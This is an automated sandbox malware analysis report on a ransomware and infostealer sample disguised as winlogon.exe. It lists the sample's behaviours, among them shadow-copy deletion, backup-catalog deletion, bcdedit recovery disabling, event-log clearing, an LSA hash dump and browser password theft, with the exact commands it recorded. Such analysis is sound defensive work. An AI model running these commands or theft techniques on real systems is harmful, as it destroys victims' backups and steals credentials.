
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 46216
Start time: 21:37:49
Joe Sandbox Product: CloudBasic
Start date: 12.02.2018
Overall analysis duration: 0h 8m 27s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: winlogon.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection: MAL
Classification: mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
HCA Information:
  • Successful, ratio: 97%
  • Number of executed functions: 181
  • Number of non-executed functions: 171
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 54.9% (good quality ratio 51.4%)
  • Quality average: 79%
  • Quality standard deviation: 29.3%
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
  • Connection to analysis system has been lost
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which no longer works.
Sample drops PE files which have not been started; submit the dropped PE samples for a secondary analysis to Joe Sandbox.
Sample may offer command line options; please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like "-", "/", "--").
Sample tries to load a library which is not present or installed on the analysis machine; adding the library might reveal more behavior.



Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe | virustotal: Detection: 59%
Antivirus detection for submitted file
Source: winlogon.exe | virustotal: Detection: 62%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D64140 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_00D64140
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10001D60 GetFileAttributesA,GetTempPathA,GetTempFileNameA,CopyFileA,CryptUnprotectData,HeapAlloc,LocalFree,HeapFree,DeleteFileA,2_2_10001D60
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100010C0 StrStrIW,lstrlenW,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,wsprintfA,wsprintfA,CryptDestroyHash,CryptReleaseContext,2_2_100010C0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10001200 StrStrIW,lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,LocalFree,2_2_10001200

Spam, unwanted Advertisements and Ransom Demands:

Deletes shadow drive data (may be related to ransomware)
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: winlogon.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: _usm.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\cmd.exeWinSta0\Defaulto
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quieth
Source: cmd.exe | Binary or memory string: ? c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: cmd.exe | Binary or memory string: ?c:\Windows\system32\vssadmin.exe delete shadows /all /quiettemn
Source: cmd.exe | Binary or memory string: 9C:\Windows\system32\cmd.exe/cc:\Windows\system32\vssadmin.exedeleteshadows/all/quietESSOR_LEVEL=6PROCESSOR_REVISION=3f02ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\A(0
Source: vssadmin.exe | Binary or memory string: Lc:\Windows\system32\vssadmin.exedeleteshadows/all/quiet,
Source: vssadmin.exe | Binary or memory string: c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: vssadmin.exe | Binary or memory string: C:\Users\user\Desktop\c:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quietc:\Windows\system32\vssadmin.exe delete shadows /all /quietWinSta0\Default
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe | Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: _usm.exe.1.dr | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
May disable shadow drive data (uses vssadmin)
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet

Networking:

Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: 252.0.0.224.in-addr.arpa
Urls found in memory or binary data
Source: yegus.exe | String found in binary or memory: file:///C:/jbxinitvm.au3
Source: yegus.exe | String found in binary or memory: file:///C:/jbxinitvm.au3s
Source: yegus.exe | String found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: yegus.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: yegus.exe | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: yegus.exe | String found in binary or memory: http://crl.thawte.com/ThawtePCA-G3.crl0
Source: yegus.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: yegus.exe | String found in binary or memory: http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
Source: yegus.exe | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: yegus.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: yegus.exe | String found in binary or memory: http://ocsp.digicert.com0K
Source: yegus.exe | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: yegus.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: yegus.exe | String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: yegus.exe | String found in binary or memory: http://s.symcd.com0_
Source: yegus.exe | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0/
Source: yegus.exe | String found in binary or memory: http://t2.symcb.com0A
Source: winlogon.exe, _wjg.exe.1.dr | String found in binary or memory: http://www.sysinternals.com
Source: yegus.exe | String found in binary or memory: https://d.symcb.com/cps0%
Source: yegus.exe | String found in binary or memory: https://d.symcb.com/rpa0
Source: yegus.exe | String found in binary or memory: https://www.digicert.com/CPS0
Source: yegus.exe | String found in binary or memory: https://www.thawte.com/cps0)
Source: yegus.exe | String found in binary or memory: https://www.thawte.com/cps07
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) (31 identical entries)
Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) (31 identical entries)

Stealing of Sensitive Information:

Contains functionality to dump credential hashes (LSA Dump)
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100114D0 LoadLibraryW,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,3_2_100114D0
Contains functionality to steal Chrome passwords
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: \Google\Chrome\User Data\Default\Login Data 2_2_10001FB0
Contains functionality to steal Internet Explorer form passwords
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 2_2_10082020
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\logins.json
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\ucngw.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
May use bcdedit to modify the Windows boot settings
Source: winlogon.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: _usm.exe | Binary or memory string: bcdedit.exe
Source: _usm.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Source: cmd.exe | Binary or memory string: 'Abcdedit.exeV
Source: cmd.exe | Binary or memory string: 'Cbcdedit.exe
Source: cmd.exe | Binary or memory string: bcdedit.exe
Source: cmd.exe | Binary or memory string: indows\system32\bcdedit.exe
Source: cmd.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit.exe*}
Source: cmd.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures B
Source: cmd.exe | Binary or memory string: 1C:\Windows\system32\bcdedit.exe\??\C:\Windows\system32\bcdedit.exe
Source: cmd.exe | Binary or memory string: >C:\Windows\system32\cmd.exe/cbcdedit.exe/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenablednoamFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\AppData\Local\TempTMP=C:\Users\HERBBL~1\AppData\Local\TempUSERDOMAIN=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BV
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exe
Source: cmd.exe | Binary or memory string: InternalNamebcdedit.exe
Source: cmd.exe | Binary or memory string: OriginalFilenamebcdedit.exej%
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktopbcdedit.exeB
Source: cmd.exe | Binary or memory string: indows\system32\bcdedit.exe.0\7
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit*B
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noC:\Windows\system32\cmd.exeWinSta0\Defaultf
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noa
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\bC:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled nodWinSta0\Default=C:=C:\Users\user\Desktop=ExitCode=00000000=Z:=Z:\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDENTIFIER=x
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: @bcdedit.exe/set{default}bootstatuspolicyignoreallfailuresackburnLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: bcdedit.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures WinSta0\Default
Source: bcdedit.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe | Binary or memory string: bcdedit.exeBC:\Users\user\Desktop\
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: bcdedit.exeBC:\Users\user\Desktop\
Source: bcdedit.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled noWinSta0\Defaulti
Source: bcdedit.exe | Binary or memory string: hj4`=\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: _usm.exe.1.dr | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH
Uses bcdedit to modify the Windows boot settings
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath,1_2_00D643A0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B696 push ecx; ret 1_2_00D6B6A9
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013348F6 push ecx; ret 2_2_01334909
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10083436 push ecx; ret 2_2_10083449
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51CE6 push ecx; ret 3_2_00C51CF9
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001966 push ecx; ret 3_2_10001979
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00142CC5 push ecx; ret 4_2_00142CD8

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D75F8F FindFirstFileExW,1_2_00D75F8F
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01339A82 FindFirstFileExW,2_2_01339A82
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10088620 FindFirstFileExA,2_2_10088620
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5850A FindFirstFileExW,3_2_00C5850A
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10008EEC FindFirstFileExA,3_2_10008EEC
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose,4_2_00141441
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Found PSEXEC tool (often used for remote process execution)
Source: winlogon.exe | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console
Source: _wjg.exe.1.dr | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console

System Summary:

barindex
Submission file is bigger than most known malware samplesShow sources
Source: winlogon.exeStatic file information: File size 1861632 > 1048576
PE file has a big raw sectionShow sources
Source: winlogon.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x195c00
PE file contains a mix of data directories often seen in goodwareShow sources
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: winlogon.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: winlogon.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: KERBEROS.pdb source: ucngw.exe
Source: Binary string: msv1_0.pdb source: ucngw.exe
Source: Binary string: lsasrv.pdb source: ucngw.exe
PE file contains a valid data directory to section mappingShow sources
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: winlogon.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)Show sources
Source: _wjg.exe.1.drBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServerSeTcbPrivilege"%s" %sNetIsServiceAccountnetapi32.dll_SA_{262E99C9-6160-4871-ACEC-4E61736B6F21}NT AUTHORITYNT SERVICECreateRestrictedTokenwinsta0Winlogondefaultwinsta0\winlogonwinsta0\defaultWow64DisableWow64FsRedirectionKernel32.dll%s.exefailed to readsecure: %d
Source: _wjg.exe.1.drBinary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program.
Classification label
Source: classification engine | Classification label: mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D62B90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013335E0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C61A30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001416E9 Wow64DisableWow64FsRedirection,LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,Wow64RevertWow64FsRedirection,CreateThread,Sleep,InitiateSystemShutdownExW,ExitProcess
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D64C30 CoInitializeEx,CoInitializeSecurity,CredUIParseUserNameW,LocalAlloc,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysStringLen,SysStringLen,SysStringLen,SysStringLen,CoCreateInstance,SysFreeString,wsprintfW,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoSetProxyBlanket,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysAllocString,GetModuleFileNameW,CreateFileW,GetFileSize,SafeArrayCreate,SafeArrayAccessData,ReadFile,SafeArrayUnaccessData,CloseHandle,CloseHandle,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,LocalFree,CoUninitialize
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6AAD0 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001412E8 OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle
Creates files inside the user directory
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\Public\A9E5CC701A2E98F9114060D6645A7A5B
Creates temporary files
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
Might use command line arguments
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Command line argument: <NULL> | 2_2_013338C0 (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Command line argument: <NULL> | 3_2_00C61EC0 (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: wbadmin.exe | 4_2_001416E9
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: bcdedit.exe | 4_2_001416E9
